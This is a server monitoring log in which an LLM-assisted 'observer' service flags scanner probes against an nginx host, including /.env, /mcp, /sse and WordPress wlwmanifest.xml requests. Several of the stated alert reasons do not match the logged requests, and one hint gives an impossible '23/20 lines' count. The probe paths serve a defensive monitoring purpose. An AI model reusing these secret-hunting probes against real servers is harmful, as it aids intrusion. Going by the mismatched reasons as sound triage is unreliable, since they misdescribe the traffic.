Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005189 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "ip" seen in 23/20 lines, example: "45.156.129.65" → ""
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005200 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx open() failed with a missing file error, which can indicate misconfiguration, missing resources, or probing. Not definitively malicious but warrants review. Line=2026-03-20T07:02:33.272732898Z 2026/03/20 07:02:33 [error] 422#422: *746619 open() "/usr/share/nginx/default/mcp" failed (2: No such file or directory), client: 45.156.129.65, server: _, request: "POS...
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005271 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:02:33.272885593Z 45.156.129.65 - - [20/Mar/2026:07:02:33 +0000] "54.200.221.0" "POST /mcp HTTP/2.0" 404 2401 "-" "python-httpx/0.28.1" "-"
Mar 20 07:02:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:43.196255 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:02:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:43.196295 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Open() failed due to missing file for a request to /sse; could indicate misconfiguration or missing resources but not definitive malicious activity. Line=2026-03-20T07:02:33.327988339Z 2026/03/20 07:02:33 [error] 422#422: *746619 open() "/usr/share/nginx/default/sse" failed (2: No such file or directory), client: 45.156.129.65, server: _, request: "GET...
Mar 20 07:02:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:43.196345 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:02:33.328076723Z 45.156.129.65 - - [20/Mar/2026:07:02:33 +0000] "54.200.221.0" "GET /sse HTTP/2.0" 404 2401 "-" "python-httpx/0.28.1" "-"
Mar 20 07:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:47.642412 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 07:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:47.642454 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 07:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:47.642510 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:02:33.526846414Z 45.156.129.67 - - [20/Mar/2026:07:02:33 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6...
Mar 20 07:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:01.941526 [observer] Pipeline: processed=2630 pattern_hits=2573 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:01.941553 [observer] Patterns: hash=2573 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:31.938074 [observer] Pipeline: processed=2632 pattern_hits=2575 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:31.938098 [observer] Patterns: hash=2575 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:01.947903 [observer] Pipeline: processed=2636 pattern_hits=2579 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:01.948701 [observer] Patterns: hash=2579 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:31.946153 [observer] Pipeline: processed=2638 pattern_hits=2581 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:31.946200 [observer] Patterns: hash=2581 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:01.938734 [observer] Pipeline: processed=2644 pattern_hits=2587 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:01.938757 [observer] Patterns: hash=2587 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:31.933929 [observer] Pipeline: processed=2646 pattern_hits=2589 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:31.933953 [observer] Patterns: hash=2589 
prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:01.955439 [observer] Pipeline: processed=2648 pattern_hits=2591 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:01.955466 [observer] Patterns: hash=2591 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:31.942297 [observer] Pipeline: processed=2652 pattern_hits=2595 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:31.942329 [observer] Patterns: hash=2595 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:01.972232 [observer] Pipeline: processed=2654 pattern_hits=2597 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:01.972258 [observer] Patterns: hash=2597 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:31.935317 [observer] Pipeline: processed=2658 pattern_hits=2601 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:31.935343 [observer] Patterns: hash=2601 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:01.949221 [observer] Pipeline: processed=2660 pattern_hits=2603 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:01.949255 [observer] Patterns: hash=2603 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:31.933969 [observer] Pipeline: processed=2664 pattern_hits=2607 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:08:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 07:08:31.933991 [observer] Patterns: hash=2607 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:01.959018 [observer] Pipeline: processed=2666 pattern_hits=2609 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:01.959045 [observer] Patterns: hash=2609 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:31.938721 [observer] Pipeline: processed=2668 pattern_hits=2611 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:31.938748 [observer] Patterns: hash=2611 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:01.941079 [observer] Pipeline: processed=2674 pattern_hits=2617 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:01.941111 [observer] Patterns: hash=2617 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:31.950105 [observer] Pipeline: processed=2676 pattern_hits=2619 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:31.950131 [observer] Patterns: hash=2619 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:01.985655 [observer] Pipeline: processed=2680 pattern_hits=2623 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:01.985843 [observer] Patterns: hash=2623 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:31.946045 [observer] Pipeline: processed=2682 pattern_hits=2625 
llm_calls=57 llm_errors=0 learned=0 Mar 20 07:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:31.946081 [observer] Patterns: hash=2625 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:01.938488 [observer] Pipeline: processed=2686 pattern_hits=2629 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:01.938514 [observer] Patterns: hash=2629 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:31.942061 [observer] Pipeline: processed=2688 pattern_hits=2631 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:31.942089 [observer] Patterns: hash=2631 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:01.962496 [observer] Pipeline: processed=2690 pattern_hits=2633 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:01.962524 [observer] Patterns: hash=2633 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:31.935314 [observer] Pipeline: processed=2694 pattern_hits=2637 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:31.935346 [observer] Patterns: hash=2637 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:01.958652 [observer] Pipeline: processed=2696 pattern_hits=2639 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:01.958690 [observer] Patterns: hash=2639 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 
07:14:31.935849 [observer] Pipeline: processed=2700 pattern_hits=2643 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:31.935880 [observer] Patterns: hash=2643 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:01.946090 [observer] Pipeline: processed=2704 pattern_hits=2647 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:01.946213 [observer] Patterns: hash=2647 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:31.936034 [observer] Pipeline: processed=2708 pattern_hits=2651 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:31.936062 [observer] Patterns: hash=2651 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:01.947892 [observer] Pipeline: processed=2710 pattern_hits=2653 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:01.947921 [observer] Patterns: hash=2653 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:31.954237 [observer] Pipeline: processed=2712 pattern_hits=2655 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:31.954263 [observer] Patterns: hash=2655 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57 Mar 20 07:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:01.963937 [observer] Pipeline: processed=2716 pattern_hits=2659 llm_calls=57 llm_errors=0 learned=0 Mar 20 07:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:01.963963 [observer] Patterns: hash=2659 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 
misses=57
Mar 20 07:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:31.948836 [observer] Pipeline: processed=2718 pattern_hits=2661 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:31.948861 [observer] Patterns: hash=2661 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:17:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:45.198545 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T07:17:45.198284581Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726134 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726196 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an HTTP 400 response with an empty/requestless line and placeholder values in the normalized form, indicating a potential anomalous access attempt. Line=2026-03-20T07:17:45.230655202Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "_" "" 400 0 "-" "-" "-"
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726457 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.348072122Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726509 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.399487040Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726548 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.435842926Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //xmlrpc.php?rsd HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.472022483Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726817 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.515277488Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726852 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.548006633Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //web/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726934 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.580011346Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726977 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.611959116Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //website/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 1...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727009 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.646186041Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; ...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727150 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.685915307Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //news/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727199 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.725096170Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //2018/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727231 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.764326332Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727264 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.796368110Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727297 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.831204546Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727331 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.864220199Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727714 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.897872392Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //media/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10....
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727758 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.934917702Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727792 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.967818010Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727831 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.999678593Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727864 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:46.031931926Z 185.193.156.145 - - [20/Mar/2026:07:17:46 +0000] "media.admin.kovicloud.com" "GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:54.536665 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 07:17:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:54.536703 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 07:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:01.950669 [observer] Pipeline: processed=2745 pattern_hits=2686 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:01.950725 [observer] Patterns: hash=2686 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:31.944006 [observer] Pipeline: processed=2747 pattern_hits=2688 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:31.944031 [observer] Patterns: hash=2688 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:01.953025 [observer] Pipeline: processed=2751 pattern_hits=2692 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:01.953058 [observer] Patterns: hash=2692 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:31.941498 [observer] Pipeline: processed=2753 pattern_hits=2694 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:31.941526 [observer] Patterns: hash=2694 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:01.937361 [observer] Pipeline: processed=2757 pattern_hits=2698 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:01.937388 
[observer] Patterns: hash=2698 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:31.936728 [observer] Pipeline: processed=2761 pattern_hits=2702 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:31.936754 [observer] Patterns: hash=2702 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:01.952053 [observer] Pipeline: processed=2763 pattern_hits=2704 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:01.952635 [observer] Patterns: hash=2704 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:31.936726 [observer] Pipeline: processed=2767 pattern_hits=2708 llm_calls=59 llm_errors=0 learned=0 Mar 20 